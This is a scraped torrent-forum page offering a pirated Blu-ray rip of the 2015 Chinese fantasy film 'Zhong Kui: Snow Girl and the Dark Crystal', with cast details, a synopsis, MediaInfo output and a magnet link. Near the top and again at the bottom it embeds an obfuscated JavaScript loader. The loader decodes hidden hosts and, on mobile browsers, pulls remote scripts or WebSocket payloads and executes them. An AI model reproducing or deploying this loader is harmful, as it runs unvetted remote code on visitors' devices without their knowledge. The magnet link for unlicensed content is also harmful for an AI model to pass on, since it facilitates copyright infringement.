钟馗伏魔:雪妖魔灵[国语配音/中文字幕].Zhongkui.Snow.Girl.and.the.Dark.Crystal.2015.1080p.BluRay.x265.10bit.DTS 6.73GB

版主小s 1月前 206

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 钟馗伏魔:雪妖魔灵 / Zhong Kui: Snow Girl and the Dark Crystal
◎年  代 2015
◎产  地 中国大陆 / 中国香港 / 美国
◎类  别 动作 / 爱情 / 奇幻
◎语  言 汉语普通话
◎上映日期 2015-02-19(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt3585004/
◎豆瓣评分 4.3/10 (78406人评价)
◎豆瓣链接 https://movie.douban.com/subject/25713420/
◎片  长 118分钟
◎导  演 鲍德熹 Peter Pau (id:1294116)
       赵天宇 Tianyu Zhao (id:1314029)
◎编  剧 赵天宇 Tianyu Zhao (id:1314029)
       秦溱 Zhen Qin (id:1334191)
       沈诗棋 Shiqi Shen (id:1328717)
       李洁 Jie Li (id:1346580)
       金镭 Lei Jin (id:1345175)
       张唤唤 Huanhuan Zhang (id:1345174)
       陈汗 Khan Chan (id:1319393)
       秀之树 Zhishu Xiu (id:1354746)
◎演  员 陈坤 Kun Chen (id:1053618)
       李冰冰 Bingbing Li (id:1040990)
       赵文瑄 Winston Chao (id:1018759)
       杨子姗 Zishan Yang (id:1312862)
       包贝尔 Bei'er Bao (id:1315866)
       吉克隽逸 Junyi Jike (id:1336739)
       苏盛华 Shenghua Su (id:1358971)
       任娇 Jiao Ren (id:1354688)
       周笑琴 Xiaoqin Zhou (id:1381258)
       鲍德熹 Peter Pau (id:1294116)
       麦迪娜 Vicky (id:1317420)
       安晓芬 Xiaofen An (id:1331590)
       鲍德熹 Peter Pau (id:1294116)
       刘欢 Huan Liu (id:1321936)
       吉克隽逸 Junyi Jike (id:1336739)
       鲍德熹 Peter Pau (id:1294116)
       胡大为 David Wu (id:1301332)
       麦国强 Kenneth Mak (id:1290782)
       陈顾方 Shirley Chan (id:1280438)
       陈顾方 Shirley Chan (id:1280438)
       龙岚 Lan Long (id:1403764)
       鲍德熹 Peter Pau (id:1294116)
       栾迪 Di Luan (id:1450367)
       马湘宜 Xiangyi Ma (id:1355404)

◎标  签 魔幻 / 奇幻 / 2015 / 古装 / 中国大陆 / 爱情 / 动作 / 灵异

◎简  介
  魔在魔界,神在天庭,人在人间。本是神鬼殊途,却为了那一线觊觎模糊三界的界限,引发连绵跌宕的搏杀。盛唐时节,某年的七月十五,恰逢千年不遇的升仙良日,西域重镇扈都之内鬼影幢幢,阴森可怖。当年的落拓书生钟馗(陈坤 饰)得到张道仙(赵文瑄 饰)的救助,从而成为扈都的守护者。他斩妖除魔,深入魔界获得魔灵,从而拉开了与魔界弘大的战争。在此过程中,钟馗意外重逢曾经令他魂牵梦绕的女孩——雪妖(李冰冰 饰)。身份截然对立的二人,却无法阻止爱意的滋生。神魔之战逐渐白热化,                                    
                                身陷乱局中央并以捍卫人间为己任的钟馗,最终发现了令他难以置信的阴谋……

◎获奖情况 (共1项)
  第2届豆瓣电影年度榜单 (2015)
  评分最低的华语电影(提名)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 209121989470866365930157594928918349766 (0x9D536E1EA6530B59FD4D10F511FCC7C6)
  4. Complete name                            : Zhongkui.Snow.G[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.73 GiB
  8. Duration                                 : 1 h 57 min
  9. Overall bit rate                         : 8 181 kb/s
  10. Movie name                               : Zhong Kui : Snow girl and the dark crystal
  11. Encoded date                             : UTC 2021-10-23 14:29:12
  12. Writing application                      : mkvmerge v62.0.0 ('Apollo') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg / cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 57 min
  23. Bit rate                                 : 6 654 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 800 pixels
  26. Display aspect ratio                     : 2.40:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.181
  33. Stream size                              : 5.48 GiB (81%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=18.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 1 h 57 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 510 kb/s
  47. Channel(s)                               : 6 channels
  48. Channel layout                           : C L R Ls Rs LFE
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 24 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.24 GiB (18%)
  54. Title                                    : Mandarin
  55. Language                                 : Chinese
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Text #1
  59. ID                                       : 3
  60. Format                                   : PGS
  61. Muxing mode                              : zlib
  62. Codec ID                                 : S_HDMV/PGS
  63. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  64. Duration                                 : 1 h 48 min
  65. Bit rate                                 : 19.8 kb/s
  66. Count of elements                        : 1398
  67. Stream size                              : 15.3 MiB (0%)
  68. Language                                 : English
  69. Default                                  : Yes
  70. Forced                                   : No
  71. Text #2
  72. ID                                       : 4
  73. Format                                   : PGS
  74. Muxing mode                              : zlib
  75. Codec ID                                 : S_HDMV/PGS
  76. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  77. Duration                                 : 1 h 48 min
  78. Bit rate                                 : 14.5 kb/s
  79. Count of elements                        : 1390
  80. Stream size                              : 11.2 MiB (0%)
  81. Title                                    : cht
  82. Language                                 : Chinese
  83. Default                                  : No
  84. Forced                                   : No
  85. Menu #1
  86. 00:00:00.000                             : :第 01 章
  87. 00:07:13.600                             : :第 02 章
  88. 00:11:25.977                             : :第 03 章
  89. 00:17:04.982                             : :第 04 章
  90. 00:24:43.232                             : :第 05 章
  91. 00:33:21.208                             : :第 06 章
  92. 00:39:42.964                             : :第 07 章
  93. 00:43:12.548                             : :第 08 章
  94. 00:53:02.888                             : :第 09 章
  95. 00:59:55.008                             : :第 10 章
  96. 01:06:06.921                             : :第 11 章
  97. 01:10:57.670                             : :第 12 章
  98. 01:16:18.741                             : :第 13 章
  99. 01:22:37.202                             : :第 14 章
  100. 01:27:40.755                             : :第 15 章
  101. 01:32:35.133                             : :第 16 章
  102. 01:36:34.998                             : :第 17 章
  103. 01:41:01.430                             : :第 18 章
  104. 01:46:58.704                             : :第 19 章
  105. 01:50:13.065                             : :第 20 章
  106. Menu #2
  107. 00:00:00.000                             : :第 01 章
  108. 00:07:13.600                             : :第 02 章
  109. 00:11:25.977                             : :第 03 章
  110. 00:17:04.982                             : :第 04 章
  111. 00:24:43.232                             : :第 05 章
  112. 00:33:21.208                             : :第 06 章
  113. 00:39:42.964                             : :第 07 章
  114. 00:43:12.548                             : :第 08 章
  115. 00:53:02.888                             : :第 09 章
  116. 00:59:55.008                             : :第 10 章
  117. 01:06:06.921                             : :第 11 章
  118. 01:10:57.670                             : :第 12 章
  119. 01:16:18.741                             : :第 13 章
  120. 01:22:37.202                             : :第 14 章
  121. 01:27:40.755                             : :第 15 章
  122. 01:32:35.133                             : :第 16 章
  123. 01:36:34.998                             : :第 17 章
  124. 01:41:01.430                             : :第 18 章
  125. 01:46:58.704                             : :第 19 章
  126. 01:50:13.065                             : :第 20 章


TAGS 动作 奇幻 爱情

磁力链:
  • magnet:?xt=urn:btih:E4FD4066EB5990693934A1F02452C97A75ADA297

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};